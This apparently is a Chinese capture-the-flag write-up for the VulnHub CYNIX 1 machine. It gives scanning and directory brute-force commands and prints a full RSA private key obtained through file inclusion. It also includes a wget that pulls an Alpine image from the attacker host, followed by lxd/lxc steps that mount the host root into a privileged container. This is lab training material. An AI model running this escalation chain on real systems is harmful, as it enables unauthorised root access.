前言
CYNIX 1
描述
- 级别:中-难
- 用户标志:user.txt
- 根标志:root.txt
- 描述:这是一个 Boot2Root 机器。该机器与 VirtualBox 兼容,但也可以在 VMWare 中使用(未测试但应该可以使用)。DHCP 将自动分配 IP。您必须找到并读取分别存在于 user.txt 和 root.txt 中的两个标志(user 和 root)。尽情享受吧!
https://www.vulnhub.com/entry/cynix-1,394/
CYNIX 1
1、可以用两种方法确认靶场的存在,扫ip
1 2
|
netdiscover -i eth0 -r 192.168.1.0/24 nmap -sn 192.168.1.0/24
|
2、扫目标端口开发情况
1 2
|
nmap -p- -T5 192.168.56.101 #全端口扫描 nmap -sV -sC -p 25,80,110,6688 -A 192.168.56.101 -o CyNix1
|
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 2 3 4 5 6
|
gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10 0
dirb http://192.168.1.104/
dirsearch -u 192.168.136.150 -e* -x 403
|
4、通过找到文件包含漏洞获取私钥,就可以直接登录了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
|
-----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAk1VUtcYuZmM1Zmm4yNpguzzeocGpMVYC540yT90QqaD2Bsal zYqvHKEh++bOL6QTSr0NjU9ifT/lBIVSIA0TpjUTkpdIW045H+NlgMhN0q/x6Yy2 LofuB4LQqRzr6cP0paoOYNq1KYG3QF1ouGa4k1i0td4DepBxcu4JBMOm20E7BurG zo41f/YWjC5DurNjIchzl4GyBClMGSXWbIbr6sYwVx2OKyiPLFLYusrNqwJNQvxz Mf5yolEYI8WOXJzCfiPQ5VG8KXBH3FHu+DhFNgrJQjgowD15ZMQ1qpO/2FMhewR6 gcDs7rCLUUXc9/7uJ7e3zHlUyDgxakYohn3YiQIDAQABAoIBAE/cfSJa3mPZeuSc gfE9jhlwES2VD+USPljNDGyF47ZO7Y0WuGEFv43BOe6VWUYxpdNpTqM+WKCTtcwR iEafT/tT4dwf7LSxXf2PAUIhUS3W+UYjY80tGTUxD3Hbn3UDJuV1nH2bj3+ENJTL DSyHYZ1dA/dg9HnHOfeWV4UhmJxXmOAOKgU9Z73sPn4bYy4B3jnyqWn392MsQftr 69ZYauTjku9awpuR5MAXMJ9bApk9Q7LZYwwGaSZw8ceMEUj7hkZBtP9W9cilCOdl rFXnkc8CvUpLh+hX6E/JOCGsUvdPuVLWKd2bgdK099GrRaenS8SlN0AUTfyNiqg4 VE7V8AECgYEAwoGVE+Z8Tn+VD5tzQ0twK+cP2TSETkiTduYxU3rLqF8uUAc3Ye/9 TLyfyIEvU7e+hoKltdNXHZbtGrfjVbz6gGuGehIgckHPsZCAQLPwwEqp0Jzz9eSw qXI0uM7n2vSdEWfCAcJBc559JKZ5uwd0XwTPNhiUqe6DUDUOZ7kI34ECgYEAwenM gMEaFOzr/gQsmBNyDj2gR2SuOYnOWfjUO3DDleP7yXYNTcRuy6ke1kvMhf9fWw7h dq3ieU0KSHrNUQ9igFK5C8FvsB+HUyEjfVpNhFppNpWUUWKDRCypbmypLg0r+9I7 myrdBFoYv30WKVsEHus1ye4nJzKjCtkgmjYMfQkCgYA0hctcyVNt2xPEWCTC2j8b C9UCwSStAvoXFEfjk/gkqjcWUyyIXMbYjuLSwNen0qk3J1ZaCAyxJ8009s0DnPlD 7kUs93IdiFnuR+fqEO0E7+R1ObzC/JMb3oQQF4cSYBV92rfPw8Xq07RVTkL21yd8 dQ8DO5YBYS/CW+Fc7uFPgQKBgHWAVosud792UQn7PYppPhOjBBw+xdPXzVJ3lSLv kZSiMVBCWI1nGjwOnsD77VLFC+MBgV2IwFMAe9qvjvoveGCJv9d/v03ZzQZybi7n KVGp91c8DEPEjgYhigl/joR5Ns3A9p1vu72HWret9F/a5wRVQqK5zL/Tzzgjmb3Y QnkBAoGAVosEGOE7GzBMefGHjQGMNKfumeJ01+Av6siAI6gmXWAYBaU618XhFEh1 +QNoLgWvSXoBuN+pMkxnRCfMTNbD1wSk46tW3sWHkZdV31gKceOifNzMVw53bJHP /kto0eGJ/vgM0g9eyqmcpPTVqf7EwkJdo0LngOprNyTk+54ZiUg= -----END RSA PRIVATE KEY-----
|
5、利用lxd提权
1 2 3 4
|
git clone https://github.com/saghul/lxd-alpine-builder.git sudo ./build-alpine python2 -m SimpleHTTPServer wget http://192.168.56.1:8080/alpine-v3.14-x86_64-20210923_0451.tar.gz #传入目标机
|
6、用lxc提权
1 2 3 4 5 6 7 8 9 10
|
lxc image import ./alpine-v3.14-x86_64-20210923_0451.tar.gz --alias mygylq # 别名为mygylq
lxc image list #查看
lxc init mygylq mygylq -c security.privileged=true #初始化镜像
lxc config device add mygylq mygylq disk source=/ path=/mnt/root recursive=true #加载容器
lxc start mygylq #启动 lxc exec mygylq /bin/sh #进入root的sh
|
总结
就是将整个机子里面的目录,在复制进我们创建的容器中,就可以看到root的用户的文件了。
我的个人博客
FROM:gylq.gitee Author:孤桜懶契
评论